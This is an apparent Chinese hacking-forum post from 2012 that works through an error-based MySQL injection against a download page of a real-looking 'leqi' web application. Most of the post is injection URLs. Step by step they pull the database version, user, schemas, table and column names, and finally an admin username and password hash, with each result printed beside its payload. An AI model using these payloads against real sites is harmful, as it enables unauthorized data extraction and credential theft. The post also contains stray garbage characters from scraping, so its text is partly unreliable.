找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1986|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666& Y' o6 N: T8 k" x7 v& U- f( Z2 ^7 U

9 d/ m' n+ }- }: K6 `# ?4 q" H* U之前想找个测试 没想到这有 可以测试下做个记录而已
% x+ G& s  i" `
: \. [, {1 g# N$ A6 |$ {) {http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
* P7 M/ Q. L) N$ e- ?  N+ @6 Q- J2 E2 G1 o& _# j1 V
/data0/htdocs/leqi_new/app/myapp.php: Q& d% g! z1 }5 a* ^# n

3 |1 G2 x8 }3 z2 M5 X1 j( T 或者
, X: ~/ p4 P; w6 G$ s7 N% U3 }% |( b( }# v8 U
/**********version()**********/ 5.1.49-log" z. l' U5 G7 {$ u1 G# w$ B
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" v7 z% X5 w1 ~1 P& p
( j- e% F5 O5 w: m) Q/**********user()**********/  
/ z. X7 Z  n8 e/ Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 x0 c! R1 D& D3 h) Y7 U( h
7 Z: ]. F  Y- ~0 ~  r5 A/**********database()**********/  leqi4 T6 M1 ]) J0 [2 O3 t4 A! I. C' n$ ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) O. y$ q# a: U2 H
$ S) A: D  Z* k6 K. j" c) C. h
/**********limit依次递归爆库**********/" T2 X' f( V) m3 i8 T5 w. r" M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& i: r' a# G% A& n: U% E; N! \information_schema
7 w! j+ b, i& Q2 H1 Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ x; `7 x" E$ z! |' }
leqi
; B) t4 I6 W+ a" Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 O- J+ ]/ g6 P, @5 g1 l
test
. l9 P4 @8 M$ s* k7 t$ n7 p3 w
* ?: u* O4 D+ j1 b, m! e/**********limit依次递归爆表名**********/2 H+ ^, }, H! J( R! Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003, B5 z$ j, g, I* c8 ?6 F" ?
users7 t( W. V3 s3 m4 B/ v. Z! F

8 ^% Y$ A6 l/ i1 R3 l+ U+ F1 a/**********limit依次递归爆字段名**********/
1 U- ^& w9 Y7 n! H) }http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% j4 W( X6 ]+ M3 H9 X  zuser_id,username,nickname,passwd,group_id
4 {6 }  {* z% a& m; M9 Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 F( b, K- M' m  Y/wapc/5000_0005_003+ n" r$ T1 C( G
11 21. e3 ~* |' F. W. K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
4 u! |% a6 e% d! q6 E6 d, n, \/wapc/5000_0005_003
* x4 t1 \3 a9 E& h* ~- ~11 341 351 361
6 T7 F9 k$ {: s3 ^/**********爆数据**********/
" k# p# n. Y- I2 d. Hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23( `# E7 L' b6 Y2 u/ ^
admin! T8 P  g4 K& G, j6 \8 k
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23) u) ?# z: P. _; G* R/ e# F7 i
6a8b4574ca231eb8bd52764d4978ffcd& D4 d2 u6 S$ c' P" w6 V3 X5 J- m

4 x* S" @! u3 ^
$ b+ q( c: P9 O- V7 q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表